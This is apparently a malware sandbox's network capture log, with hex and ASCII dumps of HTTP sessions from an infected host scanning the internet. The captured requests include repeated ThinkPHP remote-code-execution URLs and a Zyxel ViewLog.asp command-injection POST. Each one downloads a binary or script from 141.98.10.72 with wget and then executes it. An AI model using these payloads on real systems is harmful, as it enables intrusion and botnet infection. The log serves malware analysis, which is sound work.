                                                      Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 14 Feb 2024 08:30:37 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: xian62<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp
                                                      Feb 14, 2024 09:30:37.323220015 CET432INData Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63
                                                      Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
                                                      Feb 14, 2024 09:30:37.323261023 CET1286INData Raw: 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20
                                                      Data Ascii: ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65cc7a2d_xian62_13217-6361<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="hide_me P H"><div cl
                                                      Feb 14, 2024 09:30:37.432949066 CET432INData Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63
                                                      Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
                                                      Feb 14, 2024 09:30:37.636418104 CET432INData Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63
                                                      Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      765192.168.2.1545420112.83.36.6280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.982645035 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.328341007 CET1286INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 2813
                                                      Connection: close
                                                      x-ws-request-id: 65cc7a2d_xian62_13223-7358
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 30 38 3a 33 30 3a 33 37 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 78 69 61 6e 36 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20
                                                      Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 14 Feb 2024 08:30:37 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: xian62<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp
                                                      Feb 14, 2024 09:30:37.328357935 CET1286INData Raw: 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20
                                                      Data Ascii: ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65cc7a2d_xian62_13223-7358<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="hide_me P H"><div cl
                                                      Feb 14, 2024 09:30:37.328372955 CET432INData Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63
                                                      Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
                                                      Feb 14, 2024 09:30:37.433186054 CET432INData Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63
                                                      Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
                                                      Feb 14, 2024 09:30:37.631592989 CET432INData Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63
                                                      Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      766192.168.2.155610095.101.149.14980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.193295956 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.400886059 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 35 36 33 32 36 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 37 26 23 34 36 3b 34 31 38 37 36 32 30 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d5632617&#46;1707899437&#46;41876205</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      767192.168.2.153564495.174.28.16480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.193511009 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.406630993 CET501INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Server: Apache/2.4.56 (Debian)
                                                      Content-Length: 307
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 6e 69 61 73 61 66 65 2e 69 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at www.aniasafe.it Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      768192.168.2.155765295.217.183.14180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.201438904 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.422609091 CET355INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.10.3 (Ubuntu)
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 182
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      769192.168.2.155437495.163.53.16280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.211437941 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.442157030 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      770192.168.2.155509895.134.64.16380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.227998018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.475763083 CET167INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Accept-Ranges: bytes
                                                      Set-Cookie: HFS_SID_=0.226236936170608; path=/; HttpOnly
                                                      Content-Encoding: gzip
                                                      Feb 14, 2024 09:30:37.476073027 CET1058INData Raw: 1f 8b 08 00 00 00 00 00 04 0b 9d 56 5b 6f db 36 14 7e 0f 90 ff c0 da d8 9b 75 b1 93 b8 19 6d e7 61 49 83 16 e8 da 00 75 b1 ed a9 a0 44 ca e2 42 89 1a 49 db f1 86 fd f7 9e 43 51 f2 6d 2d b0 06 41 22 f1 f2 9d ef 3b 57 cd 5f 3d 7c bc 5f fe f1 f4 86
                                                      Data Ascii: V[o6~umaIuDBICQm-A";W_=|_R/A$]'v{2S4I]3$o>./x2/S%@D,]v8d|n)AN8[ne?`T;X+6"a8Bm9X?k/m\


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      771192.168.2.155504295.86.111.17780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.233958960 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      772192.168.2.154663095.84.249.5780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.298135042 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.616250992 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      773192.168.2.154409695.50.13.878080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.323463917 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.050367117 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.286042929 CET313INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 106
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      774192.168.2.154732494.120.101.1248080
